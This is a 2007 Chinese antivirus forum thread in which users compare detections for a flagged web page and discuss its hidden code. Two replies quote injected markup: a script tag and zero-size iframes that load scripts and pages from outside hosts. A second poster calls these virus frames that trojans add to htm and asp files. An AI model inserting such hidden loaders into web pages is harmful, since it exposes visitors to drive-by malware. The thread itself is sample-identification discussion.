查看: 2358|回复: 10
收起左侧

[病毒样本] 瑞星报

[复制链接]
kp2006
头像被屏蔽
发表于 2007-11-9 12:10:47 | 显示全部楼层 |阅读模式
瑞星

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
5512345
发表于 2007-11-9 13:03:16 | 显示全部楼层
avast不报
htshandong
发表于 2007-11-9 13:53:10 | 显示全部楼层
卡巴和avg都不报
只是个介绍金山2008的网页啊,瑞星排挤金山也不用这样吧

[ 本帖最后由 htshandong 于 2007-11-9 13:54 编辑 ]
BING126
头像被屏蔽
发表于 2007-11-9 14:08:49 | 显示全部楼层
咖啡没反应!
nosferatu
头像被屏蔽
发表于 2007-11-9 14:10:49 | 显示全部楼层
红伞不报!
kp2006
头像被屏蔽
 楼主| 发表于 2007-11-9 14:16:40 | 显示全部楼层
原帖由 htshandong 于 2007-11-9 13:53 发表
卡巴和avg都不报
只是个介绍金山2008的网页啊,瑞星排挤金山也不用这样吧


瑞星没有排挤谁

你好好看看网页代码 有问题
googlehack
发表于 2007-11-9 14:35:32 | 显示全部楼层
&lt;script src=http://67.19.116.187/1.js&gt;&lt;/script&gt;<br />
&lt;iframe src=http://www.puma166.com/1.htm width=0 height=0&gt;&lt;/iframe&gt;<br />
&lt;IFRAME SRC=http://mm.987999.com/abc.htm width=1 height=1 frameborder=0&gt;&lt;/IFRAME&gt;<br />
&lt;IFRAME SRC=&quot;<a href="http://rrr.rfhwfhw.com/1.htm" target="_blank"><font color="#000000">http://rrr.rfhwfhw.com/1.htm</font></a>&quot; WIDTH=0 HEIGHT=0&gt;&lt;/IFRAME&gt;<br />
&lt;IFRAME SRC=&quot;<a href="http://un.uiiiu.com/baidu.htm" target="_blank"><font color="#000000">http://un.uiiiu.com/baidu.htm</font></a>&quot; WIDTH=0 HEIGHT=0&gt;&lt;/IFRAME&gt;<br />


就是上面的一些东西

[ 本帖最后由 googlehack 于 2007-11-9 21:03 编辑 ]
mixianfa
发表于 2007-11-9 15:08:06 | 显示全部楼层
晕 水平有限,没有看明白。
mofunzone
发表于 2007-11-9 16:08:20 | 显示全部楼层
金山毒霸的官方论坛。。
双击看一下就知道瑞星为什么会XX这种东西了,难道antivir不报iframe之后瑞星开始XX了?
金山清理专家能否增加删除所有网页HTM文件中特定字符串(可由用户自定义的)功能!
金山清理专家能否增加删除所有网页HTM文件中特定字符串(可由用户自定义的)功能!

现在很多流氓软件木马都会在所有asp,htm,HTML等文件前面或后面加上如下类似的病毒框架页面:
<script src=http://67.19.116.187/1.js></script>
<iframe src=http://www.puma166.com/1.htm width=0 height=0></iframe>
<IFRAME SRC=http://mm.987999.com/abc.htm width=1 height=1 frameborder=0></IFRAME>
<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
<IfrAmE src=http://127.0.0.1/test.htm width=0 height=0></IfrAmE>

但杀毒后不是被隔离,实际上文件我们是要的,就是无法删除这些文本html代码!(因为有单字节换行符问题)!

手工删除又太慢,试过一些自动替换软件也因为"单字节换行符问题"无法替换!




建议毒霸2008考虑功能:
a.上网弹出窗口拦截,要能拦截有些恶意网站的脚本弹窗(无限个)的脚
本但不影响其他正常网站的脚本程序!,要有白黑名单地址拦截(包
括点击的连接和地址栏)!
2
b.无法拦截时有热键关闭上网程序功能(可以自定义上网程序进程名),
   因为无法拦截时已没有系统资源调出任务管理器!
2
c.能拦截任何打开网页自动下载的程序(如流氓软件‘1.exe’),让用
户选择是否允许下载执行及是否加入白黑名单,通过白黑名单设定不拦
截正常如ppstream(tv.etshow.net) 网络电视电影插件!
2
d.白黑名单设定指定路径的本机程序是否允许修改可执行文件(*.exe,*.htm等)及打开方式!
    即可执行文件放火墙,除系统程序外只有用户允许的才可以运行、修
   改,创建可执行文件或脚本、批处理等文件!
2
e.禁止执行“autorun.inf”(软件修改注册表实现),自动删除autorun.inf及其内
   指向的可执行程序文件!
2
f.病毒捕获功能
首先软件要安装时随机产生主程序名及安装目录并加入到白黑名单中防止
自己被病毒关闭, 再由软件在根目录及系统目录中产生随机文件名的程序
文件(大小也随机产生500k-5m), 再拷贝一份这个程序文件到软件安装目录
改名为*.txt之类非可执行文件扩展名,软件设定每10分钟比对一次这几个可
执行文件和拷贝改名后的文件是否一样,不一样则被病毒感染,被改动的程序
就是新病毒样本!即可及时发现捕获未知病毒!
y37007
发表于 2007-11-9 16:53:54 | 显示全部楼层
原帖由 kp2006 于 2007-11-9 14:16 发表


瑞星没有排挤谁

你好好看看网页代码 有问题





麻烦解释下代码 ,JS还是哪?

是“网页代码”? 还是楼上兄弟说的 iframe标记? 这也报

[ 本帖最后由 y37007 于 2007-11-9 17:03 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-20 21:22 , Processed in 0.143600 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表